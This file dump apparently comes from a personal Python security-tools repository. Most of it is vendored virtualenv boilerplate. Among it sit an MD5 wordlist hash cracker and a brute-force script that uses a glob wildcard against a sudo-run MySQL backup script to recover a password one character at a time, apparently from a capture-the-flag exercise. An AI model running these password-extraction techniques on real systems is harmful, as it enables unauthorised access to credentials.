11 | 12 | 13 | def where(): 14 | f = os.path.dirname(__file__) 15 | 16 | return os.path.join(f, 'cacert.pem') 17 | 18 | 19 | if __name__ == '__main__': 20 | print(where()) 21 | -------------------------------------------------------------------------------- /MacChanger/venv/bin/pip: -------------------------------------------------------------------------------- 1 | #!/root/Desktop/PyCharm/01_Projects/MacChanger/venv/bin/python 2 | # EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip' 3 | __requires__ = 'pip==19.0.3' 4 | import re 5 | import sys 6 | from pkg_resources import load_entry_point 7 | 8 | if __name__ == '__main__': 9 | sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) 10 | sys.exit( 11 | load_entry_point('pip==19.0.3', 'console_scripts', 'pip')() 12 | ) 13 | -------------------------------------------------------------------------------- /MacChanger/venv/bin/pip3: -------------------------------------------------------------------------------- 1 | #!/root/Desktop/PyCharm/01_Projects/MacChanger/venv/bin/python 2 | # EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3' 3 | __requires__ = 'pip==19.0.3' 4 | import re 5 | import sys 6 | from pkg_resources import load_entry_point 7 | 8 | if __name__ == '__main__': 9 | sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) 10 | sys.exit( 11 | load_entry_point('pip==19.0.3', 'console_scripts', 'pip3')() 12 | ) 13 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/bin/pip: -------------------------------------------------------------------------------- 1 | #!/root/Desktop/PyCharm/01_Projects/auth/venv/bin/python 2 | # EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip' 3 | __requires__ = 'pip==19.0.3' 4 | import re 5 | import sys 6 | from pkg_resources import load_entry_point 7 | 8 | if __name__ == '__main__': 9 | sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) 10 | sys.exit( 11 | load_entry_point('pip==19.0.3', 'console_scripts', 'pip')() 12 | ) 13 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/bin/pip3: -------------------------------------------------------------------------------- 1 | #!/root/Desktop/PyCharm/01_Projects/auth/venv/bin/python 2 | # EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3' 3 | __requires__ = 'pip==19.0.3' 4 | import re 5 | import sys 6 | from pkg_resources import load_entry_point 7 | 8 | if __name__ == '__main__': 9 | sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) 10 | sys.exit( 11 | load_entry_point('pip==19.0.3', 'console_scripts', 'pip3')() 12 | ) 13 | -------------------------------------------------------------------------------- /MacChanger/venv/bin/pip3.7: -------------------------------------------------------------------------------- 1 | #!/root/Desktop/PyCharm/01_Projects/MacChanger/venv/bin/python 2 | # EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3.7' 3 | __requires__ = 'pip==19.0.3' 4 | import re 5 | import sys 6 | from pkg_resources import load_entry_point 7 | 8 | if __name__ == '__main__': 9 | sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) 10 | sys.exit( 11 | load_entry_point('pip==19.0.3', 'console_scripts', 'pip3.7')() 12 | ) 13 | -------------------------------------------------------------------------------- /NetworkScanner/venv/bin/pip: -------------------------------------------------------------------------------- 1 | #!/root/Desktop/PyCharm/01_Projects/NetworkScanner/venv/bin/python 2 | # EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip' 3 | __requires__ = 'pip==19.0.3' 4 | import re 5 | import sys 6 | from pkg_resources import load_entry_point 7 | 8 | if __name__ == '__main__': 9 | sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) 10 | sys.exit( 11 | load_entry_point('pip==19.0.3', 'console_scripts', 'pip')() 12 | ) 13 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/bin/pip3.7: -------------------------------------------------------------------------------- 1 | #!/root/Desktop/PyCharm/01_Projects/auth/venv/bin/python 2 | # EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3.7' 3 | __requires__ = 'pip==19.0.3' 4 | import re 5 | import sys 6 | from pkg_resources import load_entry_point 7 | 8 | if __name__ == '__main__': 9 | sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) 10 | sys.exit( 11 | load_entry_point('pip==19.0.3', 'console_scripts', 'pip3.7')() 12 | ) 13 | -------------------------------------------------------------------------------- /NetworkScanner/venv/bin/pip3: -------------------------------------------------------------------------------- 1 | #!/root/Desktop/PyCharm/01_Projects/NetworkScanner/venv/bin/python 2 | # EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3' 3 | __requires__ = 'pip==19.0.3' 4 | import re 5 | import sys 6 | from pkg_resources import load_entry_point 7 | 8 | if __name__ == '__main__': 9 | sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) 10 | sys.exit( 11 | load_entry_point('pip==19.0.3', 'console_scripts', 'pip3')() 12 | ) 13 | -------------------------------------------------------------------------------- /NetworkScanner/venv/bin/pip3.7: -------------------------------------------------------------------------------- 1 | #!/root/Desktop/PyCharm/01_Projects/NetworkScanner/venv/bin/python 2 | # EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3.7' 3 | __requires__ = 'pip==19.0.3' 4 | import re 5 | import sys 6 | from pkg_resources import load_entry_point 7 | 8 | if __name__ == '__main__': 9 | sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) 10 | sys.exit( 11 | load_entry_point('pip==19.0.3', 'console_scripts', 'pip3.7')() 12 | ) 13 | -------------------------------------------------------------------------------- /NetworkScanner/venv/bin/scapy: -------------------------------------------------------------------------------- 1 | #!/root/Desktop/PyCharm/01_Projects/NetworkScanner/venv/bin/python 2 | # EASY-INSTALL-ENTRY-SCRIPT: 'scapy==2.4.3','console_scripts','scapy' 3 | __requires__ = 'scapy==2.4.3' 4 | import re 5 | import sys 6 | from pkg_resources import load_entry_point 7 | 8 | if __name__ == '__main__': 9 | sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) 10 | sys.exit( 11 | load_entry_point('scapy==2.4.3', 'console_scripts', 'scapy')() 12 | ) 13 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/scapy/asn1/__init__.py: -------------------------------------------------------------------------------- 1 | # This file is part of Scapy 2 | # See http://www.secdev.org/projects/scapy for more information 3 | # Copyright (C) Philippe Biondi 4 | # This program is published under a GPLv2 license 5 | 6 | """ 7 | Package holding ASN.1 related modules. 8 | """ 9 | 10 | # We do not import mib.py because it is more bound to scapy and 11 | # less prone to be used in a standalone fashion 12 | __all__ = ["asn1", "ber"] 13 | -------------------------------------------------------------------------------- /HashCracker/hashcrack.py: -------------------------------------------------------------------------------- 1 | import hashlib 2 | 3 | wordlist_location = str(input('Enter wordlist file location: ')) 4 | hash_input = str(input('Enter hash to be cracked: ')) 5 | 6 | with open(wordlist_location, 'r') as file: 7 | for line in file.readlines(): 8 | hash_ob = hashlib.md5(line.strip().encode()) 9 | hashed_pass = hash_ob.hexdigest() 10 | if hashed_pass == hash_input: 11 | print('Found cleartext password! ' + line.strip()) 12 | exit(0) 13 | -------------------------------------------------------------------------------- /NetworkScanner/venv/bin/UTscapy: -------------------------------------------------------------------------------- 1 | #!/root/Desktop/PyCharm/01_Projects/NetworkScanner/venv/bin/python 2 | # EASY-INSTALL-ENTRY-SCRIPT: 'scapy==2.4.3','console_scripts','UTscapy' 3 | __requires__ = 'scapy==2.4.3' 4 | import re 5 | import sys 6 | from pkg_resources import load_entry_point 7 | 8 | if __name__ == '__main__': 9 | sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) 10 | sys.exit( 11 | load_entry_point('scapy==2.4.3', 'console_scripts', 'UTscapy')() 12 | ) 13 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/scapy/contrib/automotive/obd/__init__.py: -------------------------------------------------------------------------------- 1 | # This file is part of Scapy 2 | # See http://www.secdev.org/projects/scapy for more information 3 | # Copyright (C) Andreas Korb 4 | # Copyright (C) Nils Weiss 5 | # This program is published under a GPLv2 license 6 | 7 | # scapy.contrib.status = skip 8 | 9 | """ 10 | Package of contrib automotive obd specific modules 11 | that have to be loaded explicitly. 12 | """ 13 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/scapy/contrib/automotive/obd/iid/__init__.py: -------------------------------------------------------------------------------- 1 | # This file is part of Scapy 2 | # See http://www.secdev.org/projects/scapy for more information 3 | # Copyright (C) Andreas Korb 4 | # Copyright (C) Nils Weiss 5 | # This program is published under a GPLv2 license 6 | 7 | # scapy.contrib.status = skip 8 | 9 | """ 10 | Package of contrib automotive obd specific modules 11 | that have to be loaded explicitly. 12 | """ 13 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/scapy/contrib/automotive/obd/mid/__init__.py: -------------------------------------------------------------------------------- 1 | # This file is part of Scapy 2 | # See http://www.secdev.org/projects/scapy for more information 3 | # Copyright (C) Andreas Korb 4 | # Copyright (C) Nils Weiss 5 | # This program is published under a GPLv2 license 6 | 7 | # scapy.contrib.status = skip 8 | 9 | """ 10 | Package of contrib automotive obd specific modules 11 | that have to be loaded explicitly. 12 | """ 13 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/scapy/contrib/automotive/obd/pid/__init__.py: -------------------------------------------------------------------------------- 1 | # This file is part of Scapy 2 | # See http://www.secdev.org/projects/scapy for more information 3 | # Copyright (C) Andreas Korb 4 | # Copyright (C) Nils Weiss 5 | # This program is published under a GPLv2 license 6 | 7 | # scapy.contrib.status = skip 8 | 9 | """ 10 | Package of contrib automotive obd specific modules 11 | that have to be loaded explicitly. 12 | """ 13 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/scapy/contrib/automotive/obd/tid/__init__.py: -------------------------------------------------------------------------------- 1 | # This file is part of Scapy 2 | # See http://www.secdev.org/projects/scapy for more information 3 | # Copyright (C) Andreas Korb 4 | # Copyright (C) Nils Weiss 5 | # This program is published under a GPLv2 license 6 | 7 | # scapy.contrib.status = skip 8 | 9 | """ 10 | Package of contrib automotive obd specific modules 11 | that have to be loaded explicitly. 12 | """ 13 | -------------------------------------------------------------------------------- /MacChanger/venv/bin/easy_install: -------------------------------------------------------------------------------- 1 | #!/root/Desktop/PyCharm/01_Projects/MacChanger/venv/bin/python 2 | # EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install' 3 | __requires__ = 'setuptools==40.8.0' 4 | import re 5 | import sys 6 | from pkg_resources import load_entry_point 7 | 8 | if __name__ == '__main__': 9 | sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) 10 | sys.exit( 11 | load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install')() 12 | ) 13 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/bin/easy_install: -------------------------------------------------------------------------------- 1 | #!/root/Desktop/PyCharm/01_Projects/auth/venv/bin/python 2 | # EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install' 3 | __requires__ = 'setuptools==40.8.0' 4 | import re 5 | import sys 6 | from pkg_resources import load_entry_point 7 | 8 | if __name__ == '__main__': 9 | sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) 10 | sys.exit( 11 | load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install')() 12 | ) 13 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/scapy/contrib/automotive/obd/packet.py: -------------------------------------------------------------------------------- 1 | # This file is part of Scapy 2 | # See http://www.secdev.org/projects/scapy for more information 3 | # Copyright (C) Andreas Korb 4 | # Copyright (C) Nils Weiss 5 | # This program is published under a GPLv2 license 6 | 7 | # scapy.contrib.status = skip 8 | 9 | from scapy.packet import Packet 10 | 11 | 12 | class OBD_Packet(Packet): 13 | def extract_padding(self, s): 14 | return '', s 15 | -------------------------------------------------------------------------------- /MacChanger/venv/bin/easy_install-3.7: -------------------------------------------------------------------------------- 1 | #!/root/Desktop/PyCharm/01_Projects/MacChanger/venv/bin/python 2 | # EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.7' 3 | __requires__ = 'setuptools==40.8.0' 4 | import re 5 | import sys 6 | from pkg_resources import load_entry_point 7 | 8 | if __name__ == '__main__': 9 | sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) 10 | sys.exit( 11 | load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.7')() 12 | ) 13 | -------------------------------------------------------------------------------- /NetworkScanner/venv/bin/easy_install: -------------------------------------------------------------------------------- 1 | #!/root/Desktop/PyCharm/01_Projects/NetworkScanner/venv/bin/python 2 | # EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install' 3 | __requires__ = 'setuptools==40.8.0' 4 | import re 5 | import sys 6 | from pkg_resources import load_entry_point 7 | 8 | if __name__ == '__main__': 9 | sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) 10 | sys.exit( 11 | load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install')() 12 | ) 13 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/bin/easy_install-3.7: -------------------------------------------------------------------------------- 1 | #!/root/Desktop/PyCharm/01_Projects/auth/venv/bin/python 2 | # EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.7' 3 | __requires__ = 'setuptools==40.8.0' 4 | import re 5 | import sys 6 | from pkg_resources import load_entry_point 7 | 8 | if __name__ == '__main__': 9 | sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) 10 | sys.exit( 11 | load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.7')() 12 | ) 13 | -------------------------------------------------------------------------------- /NetworkScanner/venv/bin/easy_install-3.7: -------------------------------------------------------------------------------- 1 | #!/root/Desktop/PyCharm/01_Projects/NetworkScanner/venv/bin/python 2 | # EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.7' 3 | __requires__ = 'setuptools==40.8.0' 4 | import re 5 | import sys 6 | from pkg_resources import load_entry_point 7 | 8 | if __name__ == '__main__': 9 | sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) 10 | sys.exit( 11 | load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.7')() 12 | ) 13 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/scapy/__main__.py: -------------------------------------------------------------------------------- 1 | # This file is part of Scapy 2 | # See http://www.secdev.org/projects/scapy for more information 3 | # Copyright (C) Philippe Biondi 4 | # This program is published under a GPLv2 license 5 | 6 | """ 7 | Scapy: create, send, sniff, dissect and manipulate network packets. 8 | 9 | Usable either from an interactive console or as a Python library. 10 | http://www.secdev.org/projects/scapy 11 | """ 12 | 13 | from scapy.main import interact 14 | 15 | interact() 16 | -------------------------------------------------------------------------------- /tcp_socket_client/.idea/auth.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 13 | -------------------------------------------------------------------------------- /Brute_Force/README.md: -------------------------------------------------------------------------------- 1 | # Brute Force Scripts 2 | + [script.py](https://github.com/h4md153v63n/Python_Scripts/blob/master/Brute_Force/README.md#scriptpy) 3 | + [script2.py](https://github.com/h4md153v63n/Python_Scripts/blob/master/Brute_Force/README.md#script2py) 4 | 5 | ## script.py 6 | 7 | ![image](https://github.com/h4md153v63n/Python_Scripts/assets/5091265/d1270864-ddf2-4df4-895c-ef6fc7d02840) 8 | 9 | 10 | ## script2.py 11 | 12 | ![image](https://github.com/h4md153v63n/Python_Scripts/assets/5091265/6746551f-41c4-4cb4-84ff-2bd3e408dc09) 13 | 14 | 15 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/requests/__version__.py: -------------------------------------------------------------------------------- 1 | # .-. .-. .-. . . .-. .-. .-. .-. 2 | # |( |- |.| | | |- `-. | `-. 3 | # ' ' `-' `-`.`-' `-' `-' ' `-' 4 | 5 | __title__ = 'requests' 6 | __description__ = 'Python HTTP for Humans.' 7 | __url__ = 'http://python-requests.org' 8 | __version__ = '2.22.0' 9 | __build__ = 0x022200 10 | __author__ = 'Kenneth Reitz' 11 | __author_email__ = 'me@kennethreitz.org' 12 | __license__ = 'Apache 2.0' 13 | __copyright__ = 'Copyright 2019 Kenneth Reitz' 14 | __cake__ = u'\u2728 \U0001f370 \u2728' 15 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/scapy/contrib/scada/__init__.py: -------------------------------------------------------------------------------- 1 | """contains packages related to SCADA protocol layers.""" 2 | 3 | from scapy.contrib.scada.iec104 import * # noqa F403,F401 4 | 5 | # This file is part of Scapy 6 | # See http://www.secdev.org/projects/scapy for more information 7 | # Copyright (C) Thomas Tannhaeuser 8 | # This program is published under a GPLv2 license 9 | # 10 | # scapy.contrib.description = SCADA related layers 11 | # scapy.contrib.status = loads 12 | 13 | 14 | # Package of contrib SCADA modules. 15 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/requests/__version__.py: -------------------------------------------------------------------------------- 1 | # .-. .-. .-. . . .-. .-. .-. .-. 2 | # |( |- |.| | | |- `-. | `-. 3 | # ' ' `-' `-`.`-' `-' `-' ' `-' 4 | 5 | __title__ = 'requests' 6 | __description__ = 'Python HTTP for Humans.' 7 | __url__ = 'http://python-requests.org' 8 | __version__ = '2.21.0' 9 | __build__ = 0x022100 10 | __author__ = 'Kenneth Reitz' 11 | __author_email__ = 'me@kennethreitz.org' 12 | __license__ = 'Apache 2.0' 13 | __copyright__ = 'Copyright 2018 Kenneth Reitz' 14 | __cake__ = u'\u2728 \U0001f370 \u2728' 15 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/requests/__version__.py: -------------------------------------------------------------------------------- 1 | # .-. .-. .-. . . .-. .-. .-. .-. 2 | # |( |- |.| | | |- `-. | `-. 3 | # ' ' `-' `-`.`-' `-' `-' ' `-' 4 | 5 | __title__ = 'requests' 6 | __description__ = 'Python HTTP for Humans.' 7 | __url__ = 'http://python-requests.org' 8 | __version__ = '2.21.0' 9 | __build__ = 0x022100 10 | __author__ = 'Kenneth Reitz' 11 | __author_email__ = 'me@kennethreitz.org' 12 | __license__ = 'Apache 2.0' 13 | __copyright__ = 'Copyright 2018 Kenneth Reitz' 14 | __cake__ = u'\u2728 \U0001f370 \u2728' 15 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/requests/certs.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | """ 5 | requests.certs 6 | ~~~~~~~~~~~~~~ 7 | 8 | This module returns the preferred default CA certificate bundle. There is 9 | only one — the one from the certifi package. 10 | 11 | If you are packaging Requests, e.g., for a Linux distribution or a managed 12 | environment, you can change the definition of where() to return a separately 13 | packaged CA bundle. 14 | """ 15 | from certifi import where 16 | 17 | if __name__ == '__main__': 18 | print(where()) 19 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/requests/__version__.py: -------------------------------------------------------------------------------- 1 | # .-. .-. .-. . . .-. .-. .-. .-. 2 | # |( |- |.| | | |- `-. | `-. 3 | # ' ' `-' `-`.`-' `-' `-' ' `-' 4 | 5 | __title__ = 'requests' 6 | __description__ = 'Python HTTP for Humans.' 7 | __url__ = 'http://python-requests.org' 8 | __version__ = '2.21.0' 9 | __build__ = 0x022100 10 | __author__ = 'Kenneth Reitz' 11 | __author_email__ = 'me@kennethreitz.org' 12 | __license__ = 'Apache 2.0' 13 | __copyright__ = 'Copyright 2018 Kenneth Reitz' 14 | __cake__ = u'\u2728 \U0001f370 \u2728' 15 | -------------------------------------------------------------------------------- /Brute_Force/script.py: -------------------------------------------------------------------------------- 1 | import string 2 | import subprocess 3 | all = list(string.ascii_letters + string.digits) 4 | password = "" 5 | found = False 6 | 7 | while not found: 8 | for character in all: 9 | command = f"echo '{password}{character}*' | sudo /opt/scripts/mysql-backup.sh" 10 | output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True).stdout 11 | 12 | if "Password confirmed!" in output: 13 | password += character 14 | print(password) 15 | break 16 | else: 17 | found = True 18 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/requests/certs.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | """ 5 | requests.certs 6 | ~~~~~~~~~~~~~~ 7 | 8 | This module returns the preferred default CA certificate bundle. There is 9 | only one — the one from the certifi package. 10 | 11 | If you are packaging Requests, e.g., for a Linux distribution or a managed 12 | environment, you can change the definition of where() to return a separately 13 | packaged CA bundle. 14 | """ 15 | from pip._vendor.certifi import where 16 | 17 | if __name__ == '__main__': 18 | print(where()) 19 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/requests/certs.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | """ 5 | requests.certs 6 | ~~~~~~~~~~~~~~ 7 | 8 | This module returns the preferred default CA certificate bundle. There is 9 | only one — the one from the certifi package. 10 | 11 | If you are packaging Requests, e.g., for a Linux distribution or a managed 12 | environment, you can change the definition of where() to return a separately 13 | packaged CA bundle. 14 | """ 15 | from pip._vendor.certifi import where 16 | 17 | if __name__ == '__main__': 18 | print(where()) 19 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/requests/certs.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | """ 5 | requests.certs 6 | ~~~~~~~~~~~~~~ 7 | 8 | This module returns the preferred default CA certificate bundle. There is 9 | only one — the one from the certifi package. 10 | 11 | If you are packaging Requests, e.g., for a Linux distribution or a managed 12 | environment, you can change the definition of where() to return a separately 13 | packaged CA bundle. 14 | """ 15 | from pip._vendor.certifi import where 16 | 17 | if __name__ == '__main__': 18 | print(where()) 19 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/pytoml/core.py: -------------------------------------------------------------------------------- 1 | class TomlError(RuntimeError): 2 | def __init__(self, message, line, col, filename): 3 | RuntimeError.__init__(self, message, line, col, filename) 4 | self.message = message 5 | self.line = line 6 | self.col = col 7 | self.filename = filename 8 | 9 | def __str__(self): 10 | return '{}({}, {}): {}'.format(self.filename, self.line, self.col, self.message) 11 | 12 | def __repr__(self): 13 | return 'TomlError({!r}, {!r}, {!r}, {!r})'.format(self.message, self.line, self.col, self.filename) 14 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/pytoml/core.py: -------------------------------------------------------------------------------- 1 | class TomlError(RuntimeError): 2 | def __init__(self, message, line, col, filename): 3 | RuntimeError.__init__(self, message, line, col, filename) 4 | self.message = message 5 | self.line = line 6 | self.col = col 7 | self.filename = filename 8 | 9 | def __str__(self): 10 | return '{}({}, {}): {}'.format(self.filename, self.line, self.col, self.message) 11 | 12 | def __repr__(self): 13 | return 'TomlError({!r}, {!r}, {!r}, {!r})'.format(self.message, self.line, self.col, self.filename) 14 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/pytoml/core.py: -------------------------------------------------------------------------------- 1 | class TomlError(RuntimeError): 2 | def __init__(self, message, line, col, filename): 3 | RuntimeError.__init__(self, message, line, col, filename) 4 | self.message = message 5 | self.line = line 6 | self.col = col 7 | self.filename = filename 8 | 9 | def __str__(self): 10 | return '{}({}, {}): {}'.format(self.filename, self.line, self.col, self.message) 11 | 12 | def __repr__(self): 13 | return 'TomlError({!r}, {!r}, {!r}, {!r})'.format(self.message, self.line, self.col, self.filename) 14 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/urllib3/util/queue.py: -------------------------------------------------------------------------------- 1 | import collections 2 | from ..packages import six 3 | from ..packages.six.moves import queue 4 | 5 | if six.PY2: 6 | # Queue is imported for side effects on MS Windows. See issue #229. 7 | import Queue as _unused_module_Queue # noqa: F401 8 | 9 | 10 | class LifoQueue(queue.Queue): 11 | def _init(self, _): 12 | self.queue = collections.deque() 13 | 14 | def _qsize(self, len=len): 15 | return len(self.queue) 16 | 17 | def _put(self, item): 18 | self.queue.append(item) 19 | 20 | def _get(self): 21 | return self.queue.pop() 22 | -------------------------------------------------------------------------------- /tcp_socket_client/auth_2.py: -------------------------------------------------------------------------------- 1 | # -*-coding:utf-8-*- 2 | import socket 3 | import hashlib 4 | 5 | # SOCK_STREAM tcp için; SOCK_DGRAM udp için kullanılır. 6 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 7 | 8 | # port ile ip adresine bağlan, url de olabilir. 9 | sock.connect(('137.135.141.116', 6666)) 10 | 11 | # server'a data gönder, bu defalarca tekrarlanabilir. 12 | sock.send(input("kullanıcı adı giriniz: ").encode()) 13 | 14 | # serverdan cevabı al. 15 | n = int(sock.recv(4096).decode()) 16 | print("NONCE VALUE\t\t : " + str(n)) 17 | 18 | sock.send("".encode("utf-8")) 19 | 20 | print("STATUS\t\t\t : " + sock.recv(4096).decode()) 21 | 22 | 23 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/requests/packages.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | # This code exists for backwards compatibility reasons. 4 | # I don't like it either. Just look the other way. :) 5 | 6 | for package in ('urllib3', 'idna', 'chardet'): 7 | locals()[package] = __import__(package) 8 | # This traversal is apparently necessary such that the identities are 9 | # preserved (requests.packages.urllib3.* is urllib3.*) 10 | for mod in list(sys.modules): 11 | if mod == package or mod.startswith(package + '.'): 12 | sys.modules['requests.packages.' + mod] = sys.modules[mod] 13 | 14 | # Kinda cool, though, right? 15 | -------------------------------------------------------------------------------- /MacChanger/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/urllib3/util/queue.py: -------------------------------------------------------------------------------- 1 | import collections 2 | from ..packages import six 3 | from ..packages.six.moves import queue 4 | 5 | if six.PY2: 6 | # Queue is imported for side effects on MS Windows. See issue #229. 7 | import Queue as _unused_module_Queue # noqa: F401 8 | 9 | 10 | class LifoQueue(queue.Queue): 11 | def _init(self, _): 12 | self.queue = collections.deque() 13 | 14 | def _qsize(self, len=len): 15 | return len(self.queue) 16 | 17 | def _put(self, item): 18 | self.queue.append(item) 19 | 20 | def _get(self): 21 | return self.queue.pop() 22 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/urllib3/util/queue.py: -------------------------------------------------------------------------------- 1 | import collections 2 | from ..packages import six 3 | from ..packages.six.moves import queue 4 | 5 | if six.PY2: 6 | # Queue is imported for side effects on MS Windows. See issue #229. 7 | import Queue as _unused_module_Queue # noqa: F401 8 | 9 | 10 | class LifoQueue(queue.Queue): 11 | def _init(self, _): 12 | self.queue = collections.deque() 13 | 14 | def _qsize(self, len=len): 15 | return len(self.queue) 16 | 17 | def _put(self, item): 18 | self.queue.append(item) 19 | 20 | def _get(self): 21 | return self.queue.pop() 22 | -------------------------------------------------------------------------------- /tcp_socket_client/venv/lib/python3.7/site-packages/pip-19.0.3-py3.7.egg/pip/_vendor/urllib3/util/queue.py: -------------------------------------------------------------------------------- 1 | import collections 2 | from ..packages import six 3 | from ..packages.six.moves import queue 4 | 5 | if six.PY2: 6 | # Queue is imported for side effects on MS Windows. See issue #229. 7 | import Queue as _unused_module_Queue # noqa: F401 8 | 9 | 10 | class LifoQueue(queue.Queue): 11 | def _init(self, _): 12 | self.queue = collections.deque() 13 | 14 | def _qsize(self, len=len): 15 | return len(self.queue) 16 | 17 | def _put(self, item): 18 | self.queue.append(item) 19 | 20 | def _get(self): 21 | return self.queue.pop() 22 | -------------------------------------------------------------------------------- /NetworkScanner/venv/lib/python3.7/site-packages/scapy/layers/gprs.py: -------------------------------------------------------------------------------- 1 | # This file is part of Scapy 2 | # See http://www.secdev.org/projects/scapy for more information 3 | # Copyright (C) Philippe Biondi 4 | # This program is published under a GPLv2 license 5 | 6 | """ 7 | GPRS (General Packet Radio Service) for mobile data communication. 8 | """ 9 | 10 | from scapy.fields import StrStopField 11 | from scapy.packet import Packet, bind_layers 12 | from scapy.layers.inet import IP 13 | 14 | 15 | class GPRS(Packet): 16 | name = "GPRSdummy" 17 | fields_desc = [ 18 | StrStopField("dummy", "", b"\x65\x00\x00", 1) 19 | ] 20 | 21 | 22 | bind_layers(GPRS, IP,) 23 | -------------------------------------------------------------------------------- 